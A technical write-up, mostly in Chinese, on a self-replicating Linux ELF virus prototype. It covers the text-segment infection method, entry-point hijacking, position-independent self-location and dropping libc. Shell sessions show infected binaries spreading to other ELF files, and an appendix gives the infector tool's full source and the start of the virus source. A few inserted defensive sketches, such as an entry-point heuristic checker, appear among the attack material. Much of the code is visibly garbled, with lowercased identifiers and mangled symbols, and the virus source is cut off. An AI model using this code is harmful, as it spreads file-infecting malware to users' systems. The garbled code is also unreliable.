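I. ** Introduction
The main purpose of this article is to summarize a Linux virus prototype I wrote
recently, and to give a brief introduction to readers who are interested in this area.
To follow the article you need some background: familiarity with ELF, the ability to
read C code with embedded assembly, and an understanding of how viruses basically work.
II. ** ELF infector (ELF file infection tool)
To produce an infected file we need an ELF infector, which is used to create the first
infected file.
ELF infection techniques are already analyzed and described very well in Silvio Cesare's
"UNIX ELF Parasites and Virus". I have not found anything to add to it, so I reproduce
Silvio Cesare's summary of the ELF infection process here for reference: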
the final algorithm is using this information is.
* increase p_shoff by page_size in the elf header
* patch the insertion code (parasite) to jump to the entry point
(original)
* locate the text segment program header
* modify the entry point of the elf header to point to the new
code (p_vaddr + p_filesz)
* increase p_filesz by account for the new code (parasite)
* increase p_memsz to account for the new code (parasite)
* for each phdr who"s segment is after the insertion (text segment)
* increase p_offset by page_size
* for the last shdr in the text segment
* increase sh_len by the parasite length
* for each shdr who"s section resides after the insertion
* increase sh_offset by page_size
* physically insert the new code (parasite) and pad to page_size, into
the file - text segment p_offset + p_filesz (original)
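Read from the defensive side, the steps above leave a recognizable footprint: the entry point is moved to the old end of the text segment, and the segment is then extended with padded code. The following is a minimal sketch of a checker built on that observation, not a reliable detector. It assumes the segment grows by a whole number of pages (as the gei tool in this article does), a 4096-byte page, and a little-endian host. The function name `entry_at_padded_tail` is invented for this example.

```c
#include <elf.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ASSUMED_PAGE_SIZE 4096u  /* assumption: 4 KiB pages */

/*
 * Heuristic check on an in-memory ELF32 image (hypothetical helper).
 * Returns 1 if the entry point sits a whole, nonzero number of pages
 * before the end of the executable PT_LOAD segment that contains it,
 * 0 if it does not, and -1 if the buffer cannot be parsed.
 * Assumes a little-endian host reading a little-endian image.
 */
int entry_at_padded_tail(const unsigned char *img, size_t len)
{
    Elf32_Ehdr eh;
    Elf32_Phdr ph;
    size_t i;

    if (len < sizeof eh)
        return -1;
    memcpy(&eh, img, sizeof eh);
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0
        || eh.e_ident[EI_CLASS] != ELFCLASS32
        || eh.e_ident[EI_DATA] != ELFDATA2LSB
        || eh.e_phentsize != sizeof ph)
        return -1;
    /* The whole program header table must lie inside the buffer. */
    if (eh.e_phoff > len
        || (size_t)eh.e_phnum * sizeof ph > len - eh.e_phoff)
        return -1;

    for (i = 0; i < eh.e_phnum; i++) {
        uint32_t end, gap;

        memcpy(&ph, img + eh.e_phoff + i * sizeof ph, sizeof ph);
        if (ph.p_type != PT_LOAD || !(ph.p_flags & PF_X))
            continue;
        end = ph.p_vaddr + ph.p_filesz;
        if (eh.e_entry < ph.p_vaddr || eh.e_entry >= end)
            continue;
        gap = end - eh.e_entry;  /* nonzero because e_entry < end */
        return gap % ASSUMED_PAGE_SIZE == 0;
    }
    return 0;
}
```

A result of 1 only means the file deserves a closer look. Ordinary binaries can match by coincidence, and an insertion that is not padded to a page boundary will not match.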
在linux病毒原型中所使用的gei - elf infector即是根据这个原理写的。在
附录中你可以看到这个感染工具的源代码: g-elf-infector.c
g-elf-infector与病毒是独立开的,其只在制作第一个病毒文件时被使用。我简单介
绍一下它的使用方法,g-elf-infector.c可以被用于任何希望--将二进制代码插入到
指定文件的文本段,并在目标文件执行时首先被执行--的用途上。g-elf-infector.c
的接口很简单,你只需要提供以下三个定义:
* 存放你的二进制代码返回地址的地址,这里需要的是这个地址与代码起始
地址的偏移,用于返回到目标程序的正常入口
#define paracode_retaddr_addr_offset 1232
* 要插入的二进制代码(由于用c编写,所以这里需要以一个函数的方式提供)
void parasite_code(void);
* 二进制代码的结束(为了易用,这里用一个结尾函数来进行代码长度计算)
void parasite_code_end(void);
parasite_code_end应该是parasite_code函数后的第一个函数定义,通常应该如下表示
void parasite_code(void)
{
...
...
...
}
void parasite_code_end(void) {}
在这里存在一个问题,就是编译有可能在编译时将parasite_code_end放在parasite_code
地址的前面,这样会导致计算代码长度时失败,为了避免这个问题,你可以这样做
void parasite_code(void)
{
...
...
...
}
void parasite_code_end(void) {parasite_code();}
有了这三个定义,g-elf-infector就能正确编译,编译后即可用来elf文件感染
~grip2@linux> ./gei foo
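III. ** How the virus prototype works
1 First, the ELF infector inserts the virus code into an ELF file. This creates the first
infected file, which carries out all subsequent propagation.
2 When the infected file is executed, control first jumps to the virus code.
3 The virus code activates. In this prototype it starts propagating immediately.
4 The virus walks every file in the current directory and infects each ELF file that
meets its requirements.
5 The infection procedure is similar to that of the ELF infector, but because the
execution environment is different, the implementation differs considerably.
6 At present the basic requirement on a target ELF file is that its text segment has
enough spare room to hold the virus code; if it does not, the virus skips that file.
An ELF file that has already been infected once has no spare room left in its text
segment, so it is never infected a second time.
7 After the virus code has run, it restores the stack and all registers (this is
important) and then jumps back to the real entry point of the executable, which then
runs normally.
This description of the workflow may seem routine and no different from the
descriptions of viruses we have long been familiar with. That is true: the principles
are all similar, and what matters is the implementation. The sections below analyze
some technical problems to show the concrete implementation approach.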
IV. ** Key technical problems and how they are handled
1 elf文件执行流程重定向和代码插入
在elf文件感染的问题上,elf infector与病毒传播时调用的infect_virus思路是一样的:
* 定位到文本段,将病毒的代码接到文本段的尾部。这个过程的关键是要熟悉
elf文件的格式,将病毒代码复制到文本段尾部后,能够根据需要调整文本段长度改变
所影响到的后续段(segment)或节(section)的虚拟地址。同时注意把新引入的文本段部
分与一个.setion建立关联,防止strip这样的工具将插入的代码去除。还有一点就是要
注意文本段增加长度的对齐问题,见elf文档中的描述:
p_align
as ``program loading"" later in this part describes, loadable
process segments must have congruent values for p_vaddr and
p_offset, modulo the page size.
* 通过过将elf文件头中的入口地址修改为病毒代码地址来完成代码重定向:
/* modify the entry point of the elf */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;
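The p_align rule quoted above is plain modular arithmetic, and a small worked example may make it easier to check by hand. The sketch below is illustrative only: the helper names `page_align_up` and `vaddr_offset_congruent` are invented here, and the page size is passed in as a parameter that must be a power of two.

```c
#include <stdint.h>

/* Round n up to the next multiple of page (page must be a power of two). */
uint32_t page_align_up(uint32_t n, uint32_t page)
{
    return (n + page - 1) & ~(page - 1);
}

/* Nonzero when p_vaddr and p_offset are congruent modulo the page size. */
int vaddr_offset_congruent(uint32_t p_vaddr, uint32_t p_offset, uint32_t page)
{
    return ((p_vaddr - p_offset) & (page - 1)) == 0;
}
```

For example, a length of 1248 bytes rounds up to 4096, so a p_offset shifted by that rounded length stays congruent with an unchanged p_vaddr, whereas a shift by the raw 1248 bytes would not.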
2 病毒代码如何返回到真正的elf文件入口
方法技巧应该很多,这里采用的方法是push+ret组合:
__asm__ volatile (
...
"return:\n\t"
"push $0xaabbccdd\n\t" /* push ret_addr */
"ret\n"
::);
其中0xaabbccdd处存放的是真正的程序入口地址,这个值在插入病毒代码时由感染程
序来填写。
3 堆栈和寄存器的恢复
病毒代码必须保证运行前、后的堆栈和寄存器内容完全相同,这通过增加额外的代码
来完成。
在进入时:
__asm__ volatile (
"push %%eax\n\t"
"push %%ecx\n\t"
"push %%edx\n\t"
::);
退出时:
__asm__ volatile (
"popl %%edx\n\t"
"popl %%ecx\n\t"
"popl %%eax\n\t"
"addl $0x102c, %%esp\n\t"
"popl %%ebx\n\t"
"popl %%esi\n\t"
"popl %%edi\n\t"
"popl %%ebp\n\t"
"jmp return\n"
要注意上面的代码是根据特定的编译器、编译选项来调整的,在不同的环境下如果重
新编译病毒程序,可能还需要做一些调整。
4 字符串的使用
write(1, "hello world\n", 12);
在病毒代码中这样对一个字符串直接引用是不可以的。这是对字符串的使用是一个绝
对地址引用,病毒代码在进入到一个新的宿主内后,这一绝对地址的内容是无法得到
保证的,因此在病毒代码内应该使用相对地址或间接地址进行字符串访问。
下面是silvio cesare的《unix elf parasites and virus》中的一个解决办法,利用
了缓冲区溢出中shellcode的编写技术:
in x86 linux, some syscalls require the use of an absolute address pointing to
initialized data. this can be made relocatable by using a common trick used
in buffer overflow code.
jmp a
b:
pop %eax ; %eax now has the address of the string
. ; continue as usual
.
.
a:
call b
.string \"hello\"
by making a call directly proceeding the string of interest, the address of
the string is pushed onto the stack as the return address.
但是在编写这个linux病毒原型代码时,我并没有使用这个方法,我尽力使代码使用
c语言的语法:
char tmpfile[32] = {"/","t","m","p","/",".","g","v","i","r","u","s","\0"};
#ifndef ndebug
char err_type[32] = {"f","i","l","e"," ","t","y","p","e"," ","n","o","t"," ",
"s","u","p","p","o","r","t","e","d","\n","\0"};
char luck[32] = {"b","e","t","t","e","r"," ","l","u","c","k"," ",
"n","e","x","t"," ","f","i","l","e","\n","\0"};
#endif
在这里将字符串以字符数组的形式出现,编译之后的代码是这样:
...
movb $47, -8312(%ebp)
movb $116, -8311(%ebp)
movb $109, -8310(%ebp)
movb $112, -8309(%ebp)
movb $47, -8308(%ebp)
movb $46, -8307(%ebp)
movb $103, -8306(%ebp)
movb $118, -8305(%ebp)
movb $105, -8304(%ebp)
movb $114, -8303(%ebp)
movb $117, -8302(%ebp)
movb $115, -8301(%ebp)
...
这样带来一个负面影响就是增加了代码长度,但是适当的使用对代码长度影响并不大。
值得注意的一点是,当字符数组定义的尺寸超过了64时,在我的编译环境下,编译器
对代码进行了优化,会导致编译后代码成为:
...
.section .rodata
.lc0:
.byte 47
.byte 116
.byte 109
.byte 112
.byte 47
.byte 46
.byte 103
.byte 118
.byte 105
.byte 114
.byte 117
.byte 115
.byte 0
...
数据被放到了.rodata section中,这样就使得其无法随病毒代码一起进入宿主,会
造成访问失败,所以注意数组的申请尽量保持32以内,防止编译器优化。
除此之外,使用整型数组的方法也与此类似,不再赘述。
5 遭遇gcc-3.3的bug
gvirus.c中有一部分的数据初始化是这样的:
...
char curdir[2] = {".", 0};
char newline = "\n";
curdir[0] = ".";
curdir[1] = 0;
newline = "\n";
if ((curfd = g_open(curdir, o_rdonly, 0)) < 0)
goto out;
...
也许你会奇怪,为什么curdir和newline在已经初始化后还要重新赋值,这其中的原因
是为了绕过一个gcc的bug。
在我的编译环境下,当只做
char curdir[2] = {".", 0};
char newline = "\n";
这样的初始化时,反汇编代码如下:
...
0x08048cb0 <parasite_code+0>: push %ebp
0x08048cb1 <parasite_code+1>: push %edi
0x08048cb2 <parasite_code+2>: push %esi
0x08048cb3 <parasite_code+3>: push %ebx
0x08048cb4 <parasite_code+4>: sub $0x20bc,%esp
0x08048cba <parasite_code+10>: push %eax
0x08048cbb <parasite_code+11>: push %ecx
0x08048cbc <parasite_code+12>: push %edx
0x08048cbd <parasite_code+13>: xor %ecx,%ecx
0x08048cbf <parasite_code+15>: lea 0x4e(%esp),%ebx <-- 使用curdir
0x08048cc3 <parasite_code+19>: mov $0x5,%eax
0x08048cc8 <parasite_code+24>: mov %ecx,%edx
0x08048cca <parasite_code+26>: int $0x80 <-- g_open系统调用
0x08048ccc <parasite_code+28>: mov %eax,0x38(%esp)
0x08048cd0 <parasite_code+32>: cmp $0xffffff82,%eax
0x08048cd3 <parasite_code+35>: jbe 0x8048cdd <parasite_code+45>
0x08048cd5 <parasite_code+37>: movl $0xffffffff,0x38(%esp)
0x08048cdd <parasite_code+45>: mov 0x38(%esp),%eax
0x08048ce1 <parasite_code+49>: test %eax,%eax
0x08048ce3 <parasite_code+51>: js 0x804915d <infect_start+1128>
0x08048ce9 <parasite_code+57>: movw $0x2e,0x4e(%esp) <-- curdir的初始化
...
从注释可以看出,在这种情况下,curdir的初始化被放到了g_open使用其做参数之后。
当加入
curdir[0] = ".";
curdir[1] = 0;
newline = "\n";
后,反汇编代码如下:
...
0x08048cb0 <parasite_code+0>: push %ebp
0x08048cb1 <parasite_code+1>: push %edi
0x08048cb2 <parasite_code+2>: push %esi
0x08048cb3 <parasite_code+3>: push %ebx
0x08048cb4 <parasite_code+4>: sub $0x20bc,%esp
0x08048cba <parasite_code+10>: push %eax
0x08048cbb <parasite_code+11>: push %ecx
0x08048cbc <parasite_code+12>: push %edx
0x08048cbd <parasite_code+13>: xor %ecx,%ecx
0x08048cbf <parasite_code+15>: movw $0x2e,0x4e(%esp) <-- curdir的初始化
0x08048cc6 <parasite_code+22>: lea 0x4e(%esp),%ebx <-- 作为参数使用
0x08048cca <parasite_code+26>: mov $0x5,%eax
0x08048ccf <parasite_code+31>: mov %ecx,%edx
0x08048cd1 <parasite_code+33>: int $0x80 <-- g_open系统调用
...
从注释可以看出,加入了这段代码后,程序编译正确,避免了这个编译器bug。
6 通过c语言和inline保证病毒代码的可读性和可移植性
用汇编写病毒代码的一个缺点就是 - 可读性和可移植性差,这也是使用汇编语言写
程序的一个普遍的缺点。
在这个linux病毒原型代码了主体使用的都是c语言,只有极少部分由于c语言本身的
限制而不得不使用gcc嵌入汇编。对于c语言部分,也尽量是用inline函数,保证代码
层次分明,保证可读性。
7 病毒代码复制时如何获得自己的起始地址?
虽然,病毒代码部分向elf infector提供了代码的起始地址,保证了生成第一个带毒
文件时能够找到代码并插入到目标文件内。但是作为进入宿主内部的代码在进行传播
时却无法使用这个地址,因为它的代码位置已经受到了宿主的影响,这时它需要重新
定位自己的起始位置。
在写这个病毒原型时,我并没有参考过其它病毒的代码,因此这里采用的也许并
不是一个最好的方法:
/* get start address of virus code */
__asm__ volatile (
"jmp get_start_addr\n"
"infect_start:\n\t"
"popl %0\n\t"
:"=m" (para_code_start_addr)
:);
para_code_start_addr -= paracode_retaddr_addr_offset - 1;
... /* c代码 */
...
__asm__ volatile (
...
"get_start_addr:\n\t"
"call infect_start\n"
"return:\n\t"
"push $0xaabbccdd\n\t" /* push ret_addr */
"ret\n"
::);
通过缓冲区溢出中的一个技巧,jmp/call组合来得到push $0xaabbccdd指令的地址。
这个地址是0xaabbccdd地址向后一个push指令,而0xaabbccdd的地址就是那个用于
存放病毒代码返回地址的地址,这个地址相对于病毒代码起始地址的偏移我们是知道
的,就是病毒代码函数向elf infector接口提供的那个宏定义的值:
#ifndef ndebug
#define paracode_retaddr_addr_offset 1704
#else
#define paracode_retaddr_addr_offset 1232
#endif
这样病毒代码在当前宿主中的位置就可以得到了(注意从汇编指令出来后,
para_code_start_addr中存放的是0xaabbccdd的地址,我们减去偏移再减
一个push指令的长度,就是病毒代码的起始地址):
para_code_start_addr -= paracode_retaddr_addr_offset - 1;
8 抛弃c库
由于病毒代码要能在不同的elf文件内容工作,所以我们必须要保证所有的相关函数
调用在病毒体内即可完成。而对c库的使用将使我们很难做到这一点,即使有的c库函
数是可以完全内联的(完全内联就是说,这个函数本身可以内联,同时其内部没有向
外的函数调用),但是随着编译环境的不同,这点也是不能得到根本保证的,因此我
们有必要选择抛弃c库。
没有了c库,我们使用到的一些函数调用就必须重新实现。在这个linux病毒原型中有
两种情况,一种是系统调用,另一种是普通的函数。
对于系统调用,我们采用了重新包装的方法:
static inline
g_syscall3(int, write, int, fd, const void *, buf, off_t, count);
static inline
g_syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count);
static inline
g_syscall3(int, open, const char *, file, int, flag, int, mode);
static inline
g_syscall1(int, close, int, fd);
static inline
g_syscall6(void *, mmap2, void *, addr, size_t, len, int, prot,
int, flags, int, fd, off_t, offset);
static inline
g_syscall2(int, munmap, void *, addr, size_t, len);
static inline
g_syscall2(int, rename, const char *, oldpath, const char *, newpath);
static inline
g_syscall2(int, fstat, int, filedes, struct stat *, buf);
并且修改了syscall包装的宏定义,如
#define g__syscall_return(type, res) \
do { \
if ((unsigned long)(res) >= (unsigned long)(-125)) { \
res = -1; \
} \
return (type) (res); \
} while (0)
#define g_syscall0(type,name) \
type g_##name(void) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__nr_##name)); \
g__syscall_return(type,__res); \
}
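The range test in g__syscall_return relies on the raw Linux convention that a failing system call returns a small negative errno value in the result register. The sketch below isolates that single comparison. `raw_ret_is_error` and its `max_errno` parameter are names invented for this example. The macro above uses 125 as the bound, while current Linux kernels reserve the last 4095 values for errors, so the bound is passed in rather than fixed.

```c
/*
 * Nonzero when a raw system call result encodes an error, i.e. when it
 * lies in [-max_errno, -1]. Casting to unsigned long maps that range
 * onto the top max_errno values, so one comparison is enough.
 */
int raw_ret_is_error(long res, long max_errno)
{
    return (unsigned long)res >= (unsigned long)(-max_errno);
}
```

With a bound of 125, a result of -126 is treated as a valid value. That matters for calls such as mmap2, whose successful results can look like large negative numbers when viewed as a signed long.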
对于普通的函数,直接复制一份函数定义:
static inline void * __memcpy(void * to, const void * from, size_t n)
{
int d0, d1, d2;
__asm__ __volatile__(
"rep ; movsl\n\t"
"testb $2,%b4\n\t"
"je 1f\n\t"
"movsw\n"
"1:\ttestb $1,%b4\n\t"
"je 2f\n\t"
"movsb\n"
"2:"
: "=&c" (d0), "=&d" (d1), "=&s" (d2)
:"0" (n/4), "q" (n),"1" ((long) to),"2" ((long) from)
: "memory");
return (to);
}
9 保证病毒代码的瘦身需要
为了保证病毒代码体积不至于过于庞大,影响病毒代码的感染,编写代码时也要注意
代码体积问题。由于采用c代码的方式,一些函数调用都是内联的方式,因此每多一个
调用都会引起代码体积的增加。
在进行elf文件读写更是如此,read/write被频繁的调用。为了减小这方面的影响,对
目标elf文件进行了一个mmap处理,这样地址空间直接被映射到文件,就消除了读目标
文件时所要做的read调用,节省了一些空间:
ehdr = g_mmap2(0, stat.st_size, prot_write|prot_read, map_shared, fd, 0);
if (ehdr == map_failed) {
goto err;
}
/* check elf magic-ident */
if (ehdr->e_ident[ei_mag0] != 0x7f
|| ehdr->e_ident[ei_mag1] != "e"
|| ehdr->e_ident[ei_mag2] != "l"
|| ehdr->e_ident[ei_mag3] != "f"
|| ehdr->e_ident[ei_class] != elfclass32
|| ehdr->e_ident[ei_data] != elfdata2lsb
|| ehdr->e_ident[ei_version] != ev_current
|| ehdr->e_type != et_exec
|| ehdr->e_machine != em_386
|| ehdr->e_version != ev_current
) {
v_debug_write(1, &err_type, sizeof(err_type));
goto err;
}
当前的代码都是用c编写,这样很难象汇编代码那样进行更高程度的精简,不过目前的
代码体积还在合理的范围,
在调试状态和标准状态分别是1744和1248
#ifndef ndebug
#define paracode_length 1744
#else
#define paracode_length 1248
#endif
10 数据结构的不一致
与c库的代码调用类似,我们使用的头文件中有一些数据类型的定义是经过
包装的,与系统调用中使用的并不相同。代码相关的两个数据结构,单独提取了出来。
struct dirent {
long d_ino;
unsigned long d_off;
unsigned short d_reclen;
char d_name[256]; /* we must not include limits.h! */
};
struct stat {
unsigned long st_dev;
unsigned long st_ino;
unsigned short st_mode;
unsigned short st_nlink;
unsigned short st_uid;
unsigned short st_gid;
unsigned long st_rdev;
unsigned long st_size;
unsigned long st_blksize;
unsigned long st_blocks;
unsigned long st_atime;
unsigned long st_atime_nsec;
unsigned long st_mtime;
unsigned long st_mtime_nsec;
unsigned long st_ctime;
unsigned long st_ctime_nsec;
unsigned long __unused4;
unsigned long __unused5;
};
V. ** Debugging in a new build environment
grip2@linux:~/tmp/virus> ls
g-elf-infector.c gsyscall.h gunistd.h gvirus.c gvirus.h foo.c makefile parasite-sample.c parasite-sample.h
调整makefile文件,将编译模式改为调试模式,即关掉-dndebug选项
grip2@linux:~/tmp/virus> cat makefile
all: foo gei
gei: g-elf-infector.c gvirus.o
gcc -o2 $< gvirus.o -o gei -wall #-dndebug
foo: foo.c
gcc $< -o foo
gvirus.o: gvirus.c
gcc $< -o2 -c -o gvirus.o -fomit-frame-pointer -wall #-dndebug
clean:
rm *.o -rf
rm foo -rf
rm gei -rf
编译代码
grip2@linux:~/tmp/virus> make
gcc foo.c -o foo
gcc gvirus.c -o2 -c -o gvirus.o -fomit-frame-pointer -wall #-dndebug
gcc -o2 g-elf-infector.c gvirus.o -o gei -wall #-dndebug
先获取病毒代码长度,然后调整gvirus.c中的#define paracode_length定义
grip2@linux:~/tmp/virus> ./gei -l <-- 这里获取病毒代码的长度
parasite code length: 1744
获取病毒代码开始位置和0xaabbccdd的地址,计算存放返回地址的地址的偏移
grip2@linux:~/tmp/virus> objdump -d gei|grep aabbccdd
8049427: 68 dd cc bb aa push $0xaabbccdd
grip2@linux:~/tmp/virus> objdump -d gei|grep "<parasite_code>"
08048d80 <parasite_code>:
8049450: e9 2b f9 ff ff jmp 8048d80 <parasite_code>
grip2@linux:~/tmp/virus> objdump -d gei|grep "<parasite_code>:"
08048d80 <parasite_code>:
0x8049427与0x8048d80相减即获得我们需要的偏移,
用这个值更新gvirus.h中的#define paracode_retaddr_addr_offset宏的值
重新编译
grip2@linux:~/tmp/virus> make clean
rm *.o -rf
rm foo -rf
rm gei -rf
grip2@linux:~/tmp/virus> make
gcc foo.c -o foo
gcc gvirus.c -o2 -c -o gvirus.o -fomit-frame-pointer -wall #-dndebug
gcc -o2 g-elf-infector.c gvirus.o -o gei -wall #-dndebug
grip2@linux:~/tmp/virus> ls
gei gsyscall.h gvirus.c gvirus.o foo.c parasite-sample.c
g-elf-infector.c gunistd.h gvirus.h foo makefile parasite-sample.h
建立一个测试目录,测试一下
grip2@linux:~/tmp/virus> mkdir test
grip2@linux:~/tmp/virus> cp gei foo test
grip2@linux:~/tmp/virus> cd test
grip2@linux:~/tmp/virus/test> ls
gei foo
grip2@linux:~/tmp/virus/test> cp foo h
制作带毒程序
grip2@linux:~/tmp/virus/test> ./gei h
file size: 8668
e_phoff: 00000034
e_shoff: 00001134
e_phentsize: 00000020
e_phnum: 00000008
e_shentsize: 00000028
e_shnum: 00000025
text segment file offset: 0
[15 sections patched]
grip2@linux:~/tmp/virus/test> ll
total 44
-rwxr-xr-x 1 grip2 users 14211 2004-12-13 07:50 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:50 foo
运行带毒程序
grip2@linux:~/tmp/virus/test> ./h
.
..
gei
foo
h
.backup.h
real elf point
grip2@linux:~/tmp/virus/test> ll
total 52
-rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo
测试上面带毒程序运行后,是否感染了其他elf程序
grip2@linux:~/tmp/virus/test> ./foo
.
..
gei
better luck next file
foo
h
better luck next file
.backup.h
better luck next file
real elf point
ok,成功
grip2@linux:~/tmp/virus/test> cp ../foo hh
grip2@linux:~/tmp/virus/test> ll
total 64
-rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:51 hh
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo
grip2@linux:~/tmp/virus/test> ./foo
.
..
gei
better luck next file
foo
h
better luck next file
.backup.h
better luck next file
hh
real elf point
grip2@linux:~/tmp/virus/test>
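VI. ** Closing remarks
I am neither a virus coder nor an anti-virus coder, so my grasp of virus techniques
is probably incomplete. If anything in this article describes virus techniques
inaccurately or analyzes them insufficiently, corrections are welcome. Thank you.
VII. ** References
1 Silvio Cesare, "UNIX ELF Parasites and Virus"
2 ELF documentation
3 Further discussion of security techniques
http://www.linuxforum.net/forum/showflat.php?cat=&board=security&
number=479955&page=0&view=collapsed&sb=5&o=31&fpart=
VIII. ** Appendix - ELF infection tool and virus prototype source code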
------------------------------ g-elf_infector.c ------------------------------
/*
* gei - elf infector v0.0.2 (2004)
* written by grip2 <gript2@hotmail.com>
*/
#include <elf.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include "gvirus.h"
#define page_size 4096
#define page_align(a) (((a) + page_size - 1) & ~(page_size - 1))
static int elf_infect(const char *filename,
void *para_code,
unsigned int para_code_size,
unsigned long retaddr_addr_offset);
int main(int argc, char *argv[])
{
#define max_filename_len 256
char backup[max_filename_len*4];
char restore[max_filename_len*4];
if (argc != 2) {
fprintf(stderr,
"gei - elf infector v0.0.2 written by grip2 <gript2@hotmail.com>\n");
fprintf(stderr, "usage: %s <elf-exec-file>\n", argv[0]);
return 1;
}
if (strcmp(argv[1], "-l") == 0) {
fprintf(stderr, "parasite code length: %d\n",
¶site_code_end - ¶site_code);
return 1;
}
if (strlen(argv[1]) > max_filename_len) {
fprintf(stderr, "filename too long!\n");
return 1;
}
sprintf(backup, "cp -f %s .backup.%s\n", argv[1], argv[1]);
sprintf(restore, "cp -f .backup.%s %s\n", argv[1], argv[1]);
system(backup);
if (elf_infect(argv[1], ¶site_code,
¶site_code_end - ¶site_code,
paracode_retaddr_addr_offset) < 0) {
system(restore);
return 1;
}
return 0;
}
static int elf_infect(const char *filename,
void *para_code,
unsigned int para_code_size,
unsigned long retaddr_addr_offset)
{
int fd = -1;
int tmp_fd = -1;
elf32_ehdr *ehdr = null;
elf32_phdr *phdr;
elf32_shdr *shdr;
int i;
int txt_index;
struct stat stat;
int align_code_size;
unsigned long org_entry;
void *new_code_pos;
int tmp_flag;
int size;
unsigned char tmp_para_code[page_size];
char *tmpfile;
tmpfile = tempnam(null, "infector");
fd = open(filename, o_rdwr);
if (fd == -1) {
perror(filename);
goto err;
}
if (fstat(fd, &stat) == -1) {
perror("fstat");
goto err;
}
#ifndef ndebug
printf("file size: %lu\n", stat.st_size);
#endif
ehdr = mmap(0, stat.st_size, prot_write|prot_read, map_shared, fd, 0);
if (ehdr == map_failed) {
perror("mmap ehdr");
goto err;
}
/* check elf magic-ident */
if (ehdr->e_ident[ei_mag0] != 0x7f
|| ehdr->e_ident[ei_mag1] != "e"
|| ehdr->e_ident[ei_mag2] != "l"
|| ehdr->e_ident[ei_mag3] != "f"
|| ehdr->e_ident[ei_class] != elfclass32
|| ehdr->e_ident[ei_data] != elfdata2lsb
|| ehdr->e_ident[ei_version] != ev_current
|| ehdr->e_type != et_exec
|| ehdr->e_machine != em_386
|| ehdr->e_version != ev_current
) {
fprintf(stderr, "file type not supported\n");
goto err;
}
#ifndef ndebug
printf("e_phoff: %08x\ne_shoff: %08x\n",
ehdr->e_phoff, ehdr->e_shoff);
printf("e_phentsize: %08x\n", ehdr->e_phentsize);
printf("e_phnum: %08x\n", ehdr->e_phnum);
printf("e_shentsize: %08x\n", ehdr->e_shentsize);
printf("e_shnum: %08x\n", ehdr->e_shnum);
#endif
align_code_size = page_align(para_code_size);
/* get program header and section header start address */
phdr = (elf32_phdr *) ((unsigned long) ehdr + ehdr->e_phoff);
shdr = (elf32_shdr *) ((unsigned long) ehdr + ehdr->e_shoff);
/* locate the text segment */
txt_index = 0;
while (1) {
if (txt_index == ehdr->e_phnum - 1) {
fprintf(stderr, "invalid e_phnum, text segment not found.\n");
goto err;
}
if (phdr[txt_index].p_type == pt_load
&& phdr[txt_index].p_flags == (pf_r|pf_x)) { /* text segment */
#ifndef ndebug
printf("text segment file offset: %u\n", phdr[txt_index].p_offset);
#endif
if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size
> phdr[txt_index+1].p_vaddr) {
fprintf(stderr, "better luck next file :-)\n");
goto err;
}
break;
}
txt_index++;
}
/* modify the entry point of the elf */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;
new_code_pos =
(void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz;
/* increase the p_filesz and p_memsz of text segment
* for new code */
phdr[txt_index].p_filesz += align_code_size;
phdr[txt_index].p_memsz += align_code_size;
for (i = 0; i < ehdr->e_phnum; i++)
if (phdr[i].p_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr)
phdr[i].p_offset += align_code_size;
tmp_flag = 0;
for (i = 0; i < ehdr->e_shnum; i++) {
if (shdr[i].sh_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr) {
shdr[i].sh_offset += align_code_size;
if (!tmp_flag && i) { /* associating the new_code to the last
* section in the text segment */
shdr[i-1].sh_size += align_code_size;
tmp_flag = 1;
printf("[%d sections patched]\n", i-1);
}
}
}
/* increase p_shoff in the elf header */
ehdr->e_shoff += align_code_size;
/* make a new file */
tmp_fd = open(tmpfile, o_wronly|o_creat, stat.st_mode);
if (tmp_fd == -1) {
perror("open");
goto err;
}
size = new_code_pos - (void *) ehdr;
if (write(tmp_fd, ehdr, size) != size) {
perror("write");
goto err;
}
memcpy(tmp_para_code, para_code, para_code_size);
memcpy(tmp_para_code + retaddr_addr_offset,
&org_entry, sizeof(org_entry));
if (write(tmp_fd, tmp_para_code, align_code_size) != align_code_size) {
perror("write");
goto err;
}
if (write(tmp_fd, (void *) ehdr + size, stat.st_size - size)
!= stat.st_size - size) {
perror("write");
goto err;
}
close(tmp_fd);
munmap(ehdr, stat.st_size);
close(fd);
if (rename(tmpfile, filename) == -1) {
perror("rename");
goto err;
}
return 0;
err:
if (tmp_fd != -1)
close(tmp_fd);
if (ehdr)
munmap(ehdr, stat.st_size);
if (fd != -1)
close(fd);
return -1;
}
------------------------------ g-elf_infector.c ------------------------------
------------------------------ gvirus.h ------------------------------
#ifndef _g2_parasite_code_
#define _g2_parasite_code_
#ifndef ndebug
#define paracode_retaddr_addr_offset 1704
#else
#define paracode_retaddr_addr_offset 1232
#endif
void parasite_code(void);
void parasite_code_end(void);
#endif
------------------------------ gvirus.h ------------------------------
------------------------------ gvirus.c ------------------------------
/*
* virus code in c (2004)
* written by grip2 <gript2@hotmail.com>
*/
#include "gsyscall.h"
#include "gvirus.h"
#include <elf.h>
#define page_size 4096
#define page_align(a) (((a) + page_size - 1) & ~(page_size - 1))
#ifndef ndebug
#define paracode_length 1744
#else
#define paracode_length 1248
#endif
#ifndef ndebug
#define v_debug_write(...) \
do {\
g_write(__va_args__);\
} while(0)
#else
#define v_debug_write(...)
#endif
